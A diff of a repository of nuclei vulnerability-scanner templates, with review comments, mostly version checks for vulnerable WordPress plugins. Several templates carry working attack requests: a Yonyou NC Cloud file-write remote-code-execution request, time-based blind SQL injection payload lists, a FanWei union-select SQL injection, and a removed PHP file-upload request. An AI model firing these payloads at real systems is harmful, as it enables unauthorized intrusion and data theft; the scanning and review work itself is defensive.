b/poc/other/responsive-block-editor-addons.yaml new file mode 100644 index 0000000000..aabcb27aed --- /dev/null +++ b/poc/other/responsive-block-editor-addons.yaml 
@@ -0,0 +1,59 @@ +id: responsive-block-editor-addons + +info: + name: > + Responsive Blocks – WordPress Gutenberg Blocks <= 1.8.8 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1c894de0-2ea7-4002-9c26-0e3e59744a5e?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/responsive-block-editor-addons/" + google-query: inurl:"/wp-content/plugins/responsive-block-editor-addons/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,responsive-block-editor-addons,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/responsive-block-editor-addons/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "responsive-block-editor-addons" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.8') \ No newline at end of file diff --git a/poc/other/rt-easy-builder-advanced-addons-for-elementor-32e6bc9d123752add9e4c25d6a9ec9b3.yaml b/poc/other/rt-easy-builder-advanced-addons-for-elementor-32e6bc9d123752add9e4c25d6a9ec9b3.yaml new file mode 100644 index 0000000000..66bb328ceb --- /dev/null +++ b/poc/other/rt-easy-builder-advanced-addons-for-elementor-32e6bc9d123752add9e4c25d6a9ec9b3.yaml 
@@ -0,0 +1,59 @@ +id: rt-easy-builder-advanced-addons-for-elementor-32e6bc9d123752add9e4c25d6a9ec9b3 + +info: + name: > + RT Easy Builder – Advanced addons for Elementor <= 2.2 - Authenticated (Contributor+) Stored Cross-site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a5fb289e-bd38-42ea-86a4-7816b59bd0b2?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/rt-easy-builder-advanced-addons-for-elementor/" + google-query: inurl:"/wp-content/plugins/rt-easy-builder-advanced-addons-for-elementor/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,rt-easy-builder-advanced-addons-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/rt-easy-builder-advanced-addons-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "rt-easy-builder-advanced-addons-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2') \ No newline at end of file diff --git a/poc/other/simple-job-board-9bc0f6e9ceea482ebafd8c072ceaed1f.yaml b/poc/other/simple-job-board-9bc0f6e9ceea482ebafd8c072ceaed1f.yaml new file mode 100644 index 0000000000..fa8b834ee8 --- /dev/null +++ b/poc/other/simple-job-board-9bc0f6e9ceea482ebafd8c072ceaed1f.yaml 
@@ -0,0 +1,59 @@ +id: simple-job-board-9bc0f6e9ceea482ebafd8c072ceaed1f + +info: + name: > + Simple Job Board <= 2.12.3 - Authenticated (Editor+) PHP Object Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ba6312b9-1b66-4b4f-a78d-515fa4aab63b?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/simple-job-board/" + google-query: inurl:"/wp-content/plugins/simple-job-board/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,simple-job-board,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/simple-job-board/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "simple-job-board" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.12.3') \ No newline at end of file diff --git a/poc/other/string-locator-b6189df65fa837d8ca49f92847869143.yaml b/poc/other/string-locator-b6189df65fa837d8ca49f92847869143.yaml new file mode 100644 index 0000000000..fb96542860 --- /dev/null +++ b/poc/other/string-locator-b6189df65fa837d8ca49f92847869143.yaml 
@@ -0,0 +1,59 @@ +id: string-locator-b6189df65fa837d8ca49f92847869143 + +info: + name: > + String Locator <= 2.6.5 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/18e0140e-ac24-48c6-aea0-bb0da203a817?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/string-locator/" + google-query: inurl:"/wp-content/plugins/string-locator/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,string-locator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/string-locator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "string-locator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.5') \ No newline at end of file diff --git a/poc/other/visual-composer-starter.yaml b/poc/other/visual-composer-starter.yaml new file mode 100644 index 0000000000..bdb2fa3fc6 --- /dev/null +++ b/poc/other/visual-composer-starter.yaml 
@@ -0,0 +1,59 @@ +id: visual-composer-starter + +info: + name: > + Visual Composer Starter <= 3.3 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/72c0fc66-44c7-4657-878a-e5109178e8e3?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/themes/visual-composer-starter/" + google-query: inurl:"/wp-content/themes/visual-composer-starter/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-theme,visual-composer-starter,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/visual-composer-starter/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "visual-composer-starter" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3') \ No newline at end of file diff --git a/poc/other/whmpress.yaml b/poc/other/whmpress.yaml new file mode 100644 index 0000000000..69fec89932 --- /dev/null +++ b/poc/other/whmpress.yaml 
@@ -0,0 +1,59 @@ +id: whmpress + +info: + name: > + WHMpress <= 6.2-revision-5 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5dea4293-0496-4cee-9d8a-c15beaa51b14?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/whmpress/" + google-query: inurl:"/wp-content/plugins/whmpress/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,whmpress,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/whmpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "whmpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.2-revision-5') \ No newline at end of file diff --git a/poc/remote_code_execution/order-export-and-more-for-woocommerce.yaml b/poc/remote_code_execution/order-export-and-more-for-woocommerce.yaml new file mode 100644 index 0000000000..d575645cd6 --- /dev/null +++ b/poc/remote_code_execution/order-export-and-more-for-woocommerce.yaml 
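Review bot: The final matcher `compare_versions(version, '<= 6.2-revision-5')` looks unable to match the affected versions, because the extractor regex `([0-9.]+)` stops at the first non-digit, so a `Stable tag: 6.2-revision-5` line yields `6.2`, and under semver-style ordering a plain `6.2` sorts above the prerelease-looking `6.2-revision-5`, making the comparison false (worth confirming against nuclei's compare_versions implementation). Given that the capture is numeric-only, the practical bound is the numeric part: `- compare_versions(version, '<= 6.2')`, with a comment that revision granularity is lost and a fixed `6.2-revision-N` build will also be flagged. Alternatively widen the capture so the suffix survives, but then the ordering of `revision-N` identifiers must be checked explicitly.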
@@ -0,0 +1,59 @@ +id: order-export-and-more-for-woocommerce + +info: + name: > + Order Export for WooCommerce <= 3.23 - Unauthenticated Sensitive Information Exposure + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0e3f8108-6b1b-4720-a450-e58b1833b608?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/order-export-and-more-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/order-export-and-more-for-woocommerce/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,order-export-and-more-for-woocommerce,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/order-export-and-more-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "order-export-and-more-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.23') \ No newline at end of file diff --git a/poc/remote_code_execution/yonyou-nc-cloud-jsinvoke-rce.yaml b/poc/remote_code_execution/yonyou-nc-cloud-jsinvoke-rce.yaml index 653783158e..cef49f23fa 100644 --- a/poc/remote_code_execution/yonyou-nc-cloud-jsinvoke-rce.yaml +++ b/poc/remote_code_execution/yonyou-nc-cloud-jsinvoke-rce.yaml 
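Review bot: This template detects an information-exposure issue (`Order Export for WooCommerce <= 3.23 - Unauthenticated Sensitive Information Exposure`, `severity: low`) yet is added under `poc/remote_code_execution/`, where the directory name will be read as a statement about impact by anyone selecting templates by path. It belongs with the rest of this batch under `poc/other/` or in a dedicated information-disclosure directory. The same path/content mismatch applies to the three cross-site-scripting templates added under `poc/sql/` in this commit (CVE-2023-0926-…, CVE-2024-6667-… and kbucket-e74990…), none of which involves SQL.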
@@ -1,43 +1,36 @@ id: yonyou-nc-cloud-jsinvoke-rce info: - name: Yonyou NC Cloud - Remote Code Execution - author: Co5mos + name: yonyou-nc-cloud-jsinvoke-rce + author: pphua severity: critical - description: An arbitrary file upload vulnerability in the Yonyou NC-Cloud system. Attackers can upload any files to the server and upload web shells, thereby gaining command execution privileges on the server. - reference: - - https://mp.weixin.qq.com/s/qL5LurGfuShf1emJuay2_Q + tags: yonyou,nc-cloud,rce + reference: + - https://mp.weixin.qq.com/s/-2fNt7rBj6j2inEmqIaoUA metadata: max-request: 2 verified: true fofa-query: app="用友-NC-Cloud" - tags: yonyou,rce - -variables: - str1: "{{rand_base(5)}}.txt" http: - raw: - - | + - | POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Content-Type: application/x-www-form-urlencoded + Accept-Encoding: gzip - {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["{{md5('yonyou-nc-cloud-jsinvoke-rce')}}","webapps/nc_web/{{str1}}"]} - + {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["StringObject","webapps/nc_web/{{randstr}}.txt"]} + - | - GET /{{str1}} HTTP/1.1 - Host: {{Hostname}} + GET /{{randstr}}.txt HTTP/1.1 + Content-Length: 138 + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - matchers-condition: and matchers: - type: word - part: body words: - - '5d8be7535d6383e99315739724e10fa7' - - - type: status - status: - - 200 \ No newline at end of file + - "StringObject" + part: body \ No newline at end of file diff --git a/poc/sql/BlindSQLAuth.yaml b/poc/sql/BlindSQLAuth.yaml index 6fd8c3c79a..ce5d86554b 100644 --- a/poc/sql/BlindSQLAuth.yaml 
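Review bot: The second raw request now sends `GET /{{randstr}}.txt` without a `Host:` header but with a stale `Content-Length: 138` on a body-less GET; nuclei may supply Host itself when the request is not marked `unsafe`, but an HTTP/1.1 server is entitled to answer 400 to a Host-less request, so restore `Host: {{Hostname}}` and drop the `Content-Length` line. The matcher has also been weakened: the per-template marker `{{md5('yonyou-nc-cloud-jsinvoke-rce')}}` that the old version both wrote and searched for is now the generic literal `StringObject`, and the `type: status` check together with `matchers-condition: and` is gone, so any error or catch-all page that happens to contain that word matches; keep a unique marker and the status check. Finally `name` has been collapsed to the template id and the `description` removed, which leaves nothing human-readable in the result output; the old name plus a one-line description noting that the first request persists a file under `webapps/nc_web/` on the target (also the artifact a defender should look for) should be restored.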
+++ b/poc/sql/BlindSQLAuth.yaml @@ -1,33 +1,33 @@ -id: time-based-sqli -info: - name: Time-Based Blind SQL Injection - author: Coffinxp/lostsec - severity: Critical - description: Detects time-based blind SQL injection vulnerability -http: - - method: GET - path: - - "{{BaseURL}}" - payloads: - injection: - - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)" - - "'%2b(select*from(select(sleep(7)))a)%2b'" - - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z" - - "'XOR(if((select now()=sysdate()),sleep(7),0))XOR'Z" - - "X'XOR(if(now()=sysdate(),/**/sleep(7)/**/,0))XOR'X" - - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--" - - "X'XOR(if(now()=sysdate(),(sleep((((7))))),0))XOR'X" - - "if(now()=sysdate(),SLEEP(7),0)" - - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z" - - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z" - fuzzing: - - part: query - type: replace - mode: single - fuzz: - - "{{injection}}" - stop-at-first-match: true - matchers: - - type: dsl - dsl: - - "duration>=7 && duration <=16" +id: time-based-sqli +info: + name: Time-Based Blind SQL Injection + author: KhukuriRimal + severity: Critical + description: Detects time-based blind SQL injection vulnerability +http: + - method: GET + path: + - "{{BaseURL}}" + payloads: + injection: + - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)" + - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z" + - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--" + - "if(now()=sysdate(),SLEEP(7),0)" + - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z" + - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z" + - "XOR(if(now()=sysdate(),sleep(7),0))XOR" + - "1%20AND%201337%3d(SELECT%201337%20FROM%20PG_SLEEP(7))--%201337" + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{injection}}" + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - "status_code == 200" + - "duration>=7 && duration <=16" + condition: and \ No newline at end of file 
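Review bot: Every line of this file is removed and re-added, most with identical text, which points to a line-ending or trailing-whitespace change being committed together with the real edits (author, payload list, the extra `status_code == 200` clause); splitting the normalization into its own commit would make the substantive change reviewable. The new `- "status_code == 200"` clause with `condition: and` means an injection that sleeps and then returns a 500 or a redirect is no longer reported, while the main false-positive source for a bare `duration>=7` check — a backend that is simply slow — is untouched; comparing against an un-injected baseline request would address that, whereas the status clause only narrows recall. The `author` field replaces `Coffinxp/lostsec` instead of appending to it, which silently drops the original attribution. The identical hunk is applied again to `poc/sql_injection/BlindSQLAuth.yaml` later in this commit.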
diff --git a/poc/sql/CVE-2023-0926-9e5bd7af9323069d7f5b80fe13c3adbc.yaml b/poc/sql/CVE-2023-0926-9e5bd7af9323069d7f5b80fe13c3adbc.yaml new file mode 100644 index 0000000000..2d88fc2615 --- /dev/null +++ b/poc/sql/CVE-2023-0926-9e5bd7af9323069d7f5b80fe13c3adbc.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2023-0926-9e5bd7af9323069d7f5b80fe13c3adbc + +info: + name: > + Custom Permalinks <= 2.6.0 - Authenticated(Editor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Custom Permalinks plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.6.0 due to insufficient input sanitization and output escaping on tag names. This allows authenticated users, with editor-level permissions or greater to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, even when 'unfiltered_html' has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/97f8549a-292d-4a6d-8ec0-550467e5cf0f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2023-0926 + metadata: + fofa-query: "wp-content/plugins/custom-permalinks/" + google-query: inurl:"/wp-content/plugins/custom-permalinks/" + shodan-query: 'vuln:CVE-2023-0926' + tags: cve,wordpress,wp-plugin,custom-permalinks,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/custom-permalinks/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "custom-permalinks" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.0') \ No newline at end of file diff --git a/poc/sql/CVE-2024-6667-4b06082c59fafdba7199d79388d0eff6.yaml b/poc/sql/CVE-2024-6667-4b06082c59fafdba7199d79388d0eff6.yaml new file mode 100644 index 0000000000..55ddf96859 --- /dev/null 
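Review bot: `severity: low` (and the `low` tag) disagrees with the classification block on the same template, which records `cvss-score: 4.4` — a score that falls in the CVSS v3 "Medium" band (4.0–6.9). Either the severity should be `medium` or the source rating used to derive `low` should be cited in the description, since downstream filtering by `-severity` will otherwise hide a medium-rated finding. The description also says "Authenticated(Editor+)" while the template itself performs no authentication; as with the rest of the batch, the check is version-only, and a sentence stating that would keep the result from being read as a confirmed exploit path.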
+++ b/poc/sql/CVE-2024-6667-4b06082c59fafdba7199d79388d0eff6.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6667-4b06082c59fafdba7199d79388d0eff6 + +info: + name: > + KBucket: Your Curated Content in WordPress <= 4.1.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The KBucket: Your Curated Content in WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via $_SERVER['REQUEST_URI'] in all versions up to, and including, 4.1.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b37087a4-83b2-4355-89f0-6ff0aa8d0013?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-6667 + metadata: + fofa-query: "wp-content/plugins/kbucket/" + google-query: inurl:"/wp-content/plugins/kbucket/" + shodan-query: 'vuln:CVE-2024-6667' + tags: cve,wordpress,wp-plugin,kbucket,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/kbucket/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "kbucket" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.4') \ No newline at end of file diff --git a/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml b/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml index 8c93d2bd55..4e7ede529c 100644 
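Review bot: This template duplicates `poc/other/kbucket-213e255d0f7bbab0012e0bbbd474a0f3.yaml` added earlier in the same commit: both reference the Wordfence entry `b37087a4-83b2-4355-89f0-6ff0aa8d0013`, fetch the same readme.txt, and end with `compare_versions(version, '<= 4.1.4')`. Keep this one, which carries `cve-id: CVE-2024-6667`, the CVSS vector and a real description, and remove the hash-named copy (or have the generator update the existing file in place when a CVE is assigned). Together with `kbucket-e74990…` (`<= 4.1.5`) the commit now ships three kbucket templates, so a single readme.txt fetch on one host will yield three findings for what is at most two issues.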
--- a/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml +++ b/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml @@ -1,39 +1,29 @@ id: FanWei + info: - name: FanWei Micro OA E-Office Uploadify Arbitrary File Upload Vulnerability + name: FanWei HrmCareerApplyPerView SQL Injection Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - The pan micro OA E-Office uploads files in uploadify.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability + FanWei There is a HrmCareerApplyPerView SQL injection vulnerability that hackers can use to obtain sensitive information- metadata: - fofa-query: app="泛微-EOffice" - hunter-query: web.title="泛微软件" + fofa-query: app="泛微-协同办公OA" + hunter-query: web.title="泛微-协同办公OA" + http: - raw: - | - POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 + GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%271%27)),db_name(1),5,6,7 HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) + Accept-Encoding: gzip, deflate Connection: close - Content-Length: 259 - Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4 - Accept-Encoding: gzip - - --e64bdf16c554bbc109cecef6451c26a4 - Content-Disposition: form-data; name="Filedata"; filename="test.php" - Content-Type: image/jpeg - - - - --e64bdf16c554bbc109cecef6451c26a4-- req-condition: true matchers: - type: dsl dsl: - - 'status_code_1 == 200 && len(body) > 0' + - 'contains(body_1, "c4ca")' condition: and - -# /attachment/3466744850/xxx.php 
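Review bot: The matcher `contains(body_1, "c4ca")` keys on four hex characters, which can appear in any hash, session token or asset fingerprint on the page; the injected expression produces the full MD5 of the string `1`, so matching the whole value, `- 'contains(body_1, "c4ca4238a0b923820dcc509a6f75849b")'`, costs nothing and removes that false-positive class. `id: FanWei` is also left unchanged although the file is now a different check for a different product module; a generic id like this collides with any other FanWei template and nuclei reports duplicate ids, so use the filename stem, `id: ecology-oa-HrmCareerApplyPerView-sqli`. The description ends in a stray hyphen and should read "FanWei E-cology exposes a SQL injection in HrmCareerApplyPerView.jsp that allows sensitive information to be read". The identical hunk is applied again to `poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml` later in this commit.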
diff --git a/poc/sql/kbucket-e74990277ea37a8d6eb0543a824bddb7.yaml b/poc/sql/kbucket-e74990277ea37a8d6eb0543a824bddb7.yaml new file mode 100644 index 0000000000..d26fcd594a --- /dev/null +++ b/poc/sql/kbucket-e74990277ea37a8d6eb0543a824bddb7.yaml @@ -0,0 +1,59 @@ +id: kbucket-e74990277ea37a8d6eb0543a824bddb7 + +info: + name: > + KBucket: Your Curated Content in WordPress <= 4.1.5 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2ff5094a-8cf2-4c18-921d-7ec31d60c13a?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/kbucket/" + google-query: inurl:"/wp-content/plugins/kbucket/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,kbucket,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/kbucket/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "kbucket" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.5') \ No newline at end of file diff --git a/poc/sql_injection/BlindSQLAuth.yaml b/poc/sql_injection/BlindSQLAuth.yaml index 6fd8c3c79a..ce5d86554b 100644 --- a/poc/sql_injection/BlindSQLAuth.yaml +++ b/poc/sql_injection/BlindSQLAuth.yaml 
@@ -1,33 +1,33 @@ -id: time-based-sqli -info: - name: Time-Based Blind SQL Injection - author: Coffinxp/lostsec - severity: Critical - description: Detects time-based blind SQL injection vulnerability -http: - - method: GET - path: - - "{{BaseURL}}" - payloads: - injection: - - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)" - - "'%2b(select*from(select(sleep(7)))a)%2b'" - - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z" - - "'XOR(if((select now()=sysdate()),sleep(7),0))XOR'Z" - - "X'XOR(if(now()=sysdate(),/**/sleep(7)/**/,0))XOR'X" - - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--" - - "X'XOR(if(now()=sysdate(),(sleep((((7))))),0))XOR'X" - - "if(now()=sysdate(),SLEEP(7),0)" - - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z" - - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z" - fuzzing: - - part: query - type: replace - mode: single - fuzz: - - "{{injection}}" - stop-at-first-match: true - matchers: - - type: dsl - dsl: - - "duration>=7 && duration <=16" +id: time-based-sqli +info: + name: Time-Based Blind SQL Injection + author: KhukuriRimal + severity: Critical + description: Detects time-based blind SQL injection vulnerability +http: + - method: GET + path: + - "{{BaseURL}}" + payloads: + injection: + - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)" + - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z" + - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--" + - "if(now()=sysdate(),SLEEP(7),0)" + - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z" + - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z" + - "XOR(if(now()=sysdate(),sleep(7),0))XOR" + - "1%20AND%201337%3d(SELECT%201337%20FROM%20PG_SLEEP(7))--%201337" + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{injection}}" + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - "status_code == 200" + - "duration>=7 && duration <=16" + condition: and \ No newline at end of file 
diff --git a/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml b/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml index 8c93d2bd55..4e7ede529c 100644 --- a/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml +++ b/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml 
